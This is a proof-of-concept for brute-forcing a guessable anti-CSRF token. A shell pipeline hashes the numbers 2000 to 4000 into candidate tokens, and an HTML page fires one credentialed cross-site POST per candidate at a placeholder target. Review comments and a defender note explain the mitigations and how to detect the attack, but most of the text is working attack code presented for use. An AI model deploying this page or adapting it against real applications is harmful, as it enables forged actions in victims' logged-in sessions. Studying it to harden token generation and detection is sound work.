#############################
#create list based on vulnerable code
seq 2000 4000 > my_file.txt
----
#!/bin/bash
#read.file.line.by.line.sh
# Reads standard input line by line and prints one MD5 hex digest per line.
# NOTE(review): the pipeline in the surrounding notes invokes
# ./read.line.by.line.sh, which does not match the file name given above.
while read line
do
# echo appends a newline, so each digest covers the line plus "\n";
# awk keeps only the hash column of md5sum's "<hash>  -" output.
echo $line | md5sum | awk '{print $1}'
done
----
more my_file.txt | ./read.line.by.line.sh | md5sum | cut -d ' ' -f 1
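In theory that would generate 2000 md5 hashes, one for each number from 2000 to 4000 in increasing order (adjust the range accordingly).
From there it's a matter of generating a Python brute-force script that follows a redirect; I wrote it a bit differently.
The enumeration is only possible if the token really is derived from a small, sequential range; a token drawn from a CSPRNG and tied to the session leaves nothing to enumerate.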
#############################
<!--
  Proof-of-concept page for an anti-CSRF token that comes from a small,
  guessable set. It reads candidate tokens from the textarea below and sends
  one credentialed, form-encoded POST per candidate to the configured URL.

  Reading this as a defender:
  * Tokens drawn from a CSPRNG (128 bits or more) and bound to the user's
    session leave no candidate list to enumerate.
  * Session cookies marked SameSite=Lax or SameSite=Strict are not attached
    to this kind of cross-site POST.
  * On the server this pattern shows up as a burst of POSTs from one session,
    each carrying a different invalid token; counting token-validation
    failures per session and alerting or invalidating the session at a
    threshold detects it.

  "(host)" and "(total here)" are placeholders left by the author.
-->
<html>
<head>
<!-- NOTE(review): jQuery is fetched over plain HTTP from a floating "latest"
     URL with no integrity attribute, and nothing below calls it (the form
     data is serialized by hand), so the include appears to be unnecessary. -->
<script src="http://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script>
</head>
<body>
<!-- The next line sits outside any script or comment, so the browser renders
     it as page text. -->
//total tokens obviously adjusted and generated
<h1>Anti-CSRF Tokens to test</h1>
<!-- One candidate token per line; the two values below are the author's samples. -->
<textarea id="tokens" rows="(total here)" cols="60">
08f90c1a417155361a5c4b8d297e0d78
d0fb963ff976f9c37fc81fe03c21ea7b
</textarea>
<script>
// Sends one request per entry of TList, in list order. The requests are opened
// asynchronously (see http.open below), so the loop does not wait for any
// response before issuing the next one.
function bruteLoop(TList) {
for (var i = 0; i < TList.length; i++) {
console.info("Testing: " + TList[i]);
XHRPost(TList[i]);
}
}
// Sends a single form-encoded POST that carries one candidate token.
// tVal: the candidate token string placed in the token field.
function XHRPost(tVal) {
var http = new XMLHttpRequest();
// Placeholder for the endpoint under test.
var url = "(host)";
var token = tVal;
//fill in accordingly
// NOTE(review): params is assigned without var/let and becomes an implicit
// global. "acdt67gshfuiuasfsg" is presumably the form field that carries the
// anti-CSRF token on the application under test; confirm.
params = {
"name" : "Bob",
"acdt67gshfuiuasfsg" : token,
};
http.open("POST", url, true);
// The string 'true' is coerced to boolean true, so the browser attaches the
// user's cookies for the target origin to the request. SameSite=Lax/Strict
// cookies are excluded from such a cross-site POST.
http.withCredentials = 'true';
//Send the proper header information along with the request
// application/x-www-form-urlencoded is one of the content types browsers send
// cross-origin without a CORS preflight, so the server still receives and
// processes the request even though this page cannot read the response.
// Server-side token and Origin checks are the control here, not CORS.
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// The handler is effectively a no-op: its only statements are commented out.
http.onreadystatechange = function() {
if (http.readyState > 1) {//We don't care about responses
//console.warn("Aborted " + token + " with status " + http.readyState);
//http.abort();
}
}
//Serialize the data without using JQuery
// NOTE(review): queryParams is also an implicit global. Only the values pass
// through encodeURIComponent; the keys are concatenated as written.
queryParams = Object.keys(params).reduce(function(a,k){a.push(k+'='+encodeURIComponent(params[k]));return a},[]).join('&');
http.send(queryParams);
}
// Collapse every run of whitespace in the textarea to a single newline and
// split on it, giving one array element per candidate token.
var tokens = document.getElementById('tokens').value.replace(/\s+/gm, '\n').split('\n');
tokens = tokens.filter(Boolean); // Remove empty lines
// Brute Loop
bruteLoop(tokens);
</script>
</body>
</html>